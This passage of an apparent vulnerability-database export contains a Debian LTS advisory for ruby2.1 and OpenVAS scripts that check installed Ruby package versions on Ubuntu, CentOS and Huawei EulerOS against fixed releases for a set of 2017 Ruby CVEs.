The lack of check made the methods\n vulnerable to unintentional socket creation and unintentional socket\n access.\n\nCVE-2018-8780\n\n ooooooo_q discovered an unintentional directory traversal in\n some methods in Dir, by the lack of checking for NUL bytes in their\n parameter.\n\nCVE-2018-1000075\n\n A negative size vulnerability in ruby gem package tar header that could\n cause an infinite loop.\n\nCVE-2018-1000076\n\n RubyGems package improperly verifies cryptographic signatures. A mis-signed\n gem could be installed if the tarball contains multiple gem signatures.\n\nCVE-2018-1000077\n\n An improper input validation vulnerability in RubyGems specification\n homepage attribute could allow malicious gem to set an invalid homepage\n URL.\n\nCVE-2018-1000078\n\n Cross Site Scripting (XSS) vulnerability in gem server display of homepage\n attribute.\n\nCVE-2018-1000079\n\n Path Traversal vulnerability during gem installation.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-07-14T06:29:07", "published": "2018-07-14T06:29:07", "id": "DEBIAN:DLA-1421-1:5BC60", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201807/msg00012.html", "title": "[SECURITY] [DLA 1421-1] ruby2.1 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901", "CVE-2017-10748"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-26T00:00:00", 
"id": "OPENVAS:1361412562310843791", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843791", "type": "openvas", "title": "Ubuntu Update for ruby1.9.1 USN-3439-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3439_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for ruby1.9.1 USN-3439-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843791\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-10748\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:20:37 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"Ubuntu Update for ruby1.9.1 USN-3439-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3439-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3439-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby1.9.1'\n package(s) announced via the USN-3439-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a buffer overrun.\n(CVE-2017-0898)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain 
files.\nAn attacker could use this to execute terminal escape sequences.\n(CVE-2017-0899)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a denial of service.\n(CVE-2017-0900)\n\nIt was discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nIt was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to execute arbitrary code.\n(CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a denial of service.\n(CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to expose sensitive information.\n(CVE-2017-14064)\");\n\n script_tag(name:\"affected\", value:\"ruby1.9.1 on Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.3\", ver:\"1.9.3.484-2ubuntu1.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", 
"CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "Check the version of ruby", "modified": "2019-03-08T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310882847", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882847", "type": "openvas", "title": "CentOS Update for ruby CESA-2018:0378 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_0378_ruby_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for ruby CESA-2018:0378 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882847\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 08:29:25 +0100 (Wed, 14 Mar 2018)\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\",\n \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\",\n \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ruby CESA-2018:0378 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ruby\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ruby is an extensible, interpreted,\nobject-oriented, scripting language. It has features to process text files and\nto perform system management tasks.\n\nSecurity Fix(es):\n\n * It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker could\nexploit this flaw to execute arbitrary commands by setting up a malicious\nFTP server and tricking a user or Ruby application into downloading files\nwith specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\n * A buffer underflow was found in ruby's sprintf function. 
An attacker,\nwith ability to control its format string parameter, could send a specially\ncrafted string that would disclose heap memory or crash the interpreter.\n(CVE-2017-0898)\n\n * It was found that rubygems did not sanitize gem names during installation\nof a given gem. A specially crafted gem could use this flaw to install\nfiles outside of the regular directory. (CVE-2017-0901)\n\n * A vulnerability was found where rubygems did not sanitize DNS responses\nwhen requesting the hostname of the rubygems server for a domain, via a\n_rubygems._tcp DNS SRV query. An attacker with the ability to manipulate\nDNS responses could direct the gem command towards a different domain.\n(CVE-2017-0902)\n\n * A vulnerability was found where the rubygems module was vulnerable to an\nunsafe YAML deserialization when inspecting a gem. Applications inspecting\ngem files without installing them can be tricked to execute arbitrary code\nin the context of the ruby interpreter. (CVE-2017-0903)\n\n * It was found that WEBrick did not sanitize all its log messages. If logs\nwere printed in a terminal, an attacker could interact with the terminal\nvia the use of escape sequences. (CVE-2017-10784)\n\n * It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially crafted\nstring to the application in order to crash the ruby interpreter, causing a\ndenial of service. (CVE-2017-14033)\n\n * A vulnerability was found where rubygems did not properly sanitize gems'\nspecification text. A specially crafted gem could interact with the\nterminal via the use of escape sequences. (CVE-2017-0899)\n\n * It was found that rubygems could use an excessive amount of CPU while\nparsing a sufficiently long gem summary. 
A specially crafted gem from a gem\nrepository could freeze gem commands attempting to parse its summary.\n(CVE-2017-0900)\n\n * A buffer overflow vulnerability was found in the JSON extension of ruby.\nAn attacker with the ability to pass a specially crafted JSON input to the\nextension could use this flaw to ex ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"ruby on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:0378\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-March/022791.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-doc\", rpm:\"ruby-doc~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-io-console\", 
rpm:\"rubygem-io-console~0.4.2~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-minitest\", rpm:\"rubygem-minitest~4.3.2~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-rake\", rpm:\"rubygem-rake~0.9.6~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14.1~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygems-devel\", rpm:\"rubygems-devel~2.0.14.1~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", 
"CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181248", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181248", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1248)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1248\");\n script_version(\"2020-01-23T11:18:47+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:18:47 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:18:47 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1248)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1248\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1248\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2018-1248 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The lazy_initialize function in lib/resolv.rb in Ruby through 2.4.3 uses Kernel#open, which 
might allow Command Injection attacks, as demonstrated by a Resolv::Hosts::new argument beginning with a '<pipe>' character, a different vulnerability than CVE-2017-17405. NOTE: situations with untrusted input may be highly unlikely.(CVE-2017-17790)\n\nA buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\n\nIt was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. (CVE-2017-14033)\n\nIt was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\nIt was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\nA vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\nIt was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. 
(CVE-2017-10784)\n\nIt was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\nA buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the inte ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS Virtualization 2.5.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.353~23.h7\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.353~23.h7\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.353~23.h7\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:39:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", 
"CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181066", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181066", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1066)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1066\");\n script_version(\"2020-01-23T11:11:17+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:11:17 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:11:17 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1066)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1066\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1066\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2018-1066 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Net::FTP module did not properly process filenames in combination with 
certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\nA buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\nIt was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\nA vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\nIt was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\nIt was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. (CVE-2017-14033)\n\nA vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. 
(CVE-2017-0899)\n\nIt was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\nA buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": 
"2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181067", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1067)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1067\");\n script_version(\"2020-01-23T11:11:28+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", 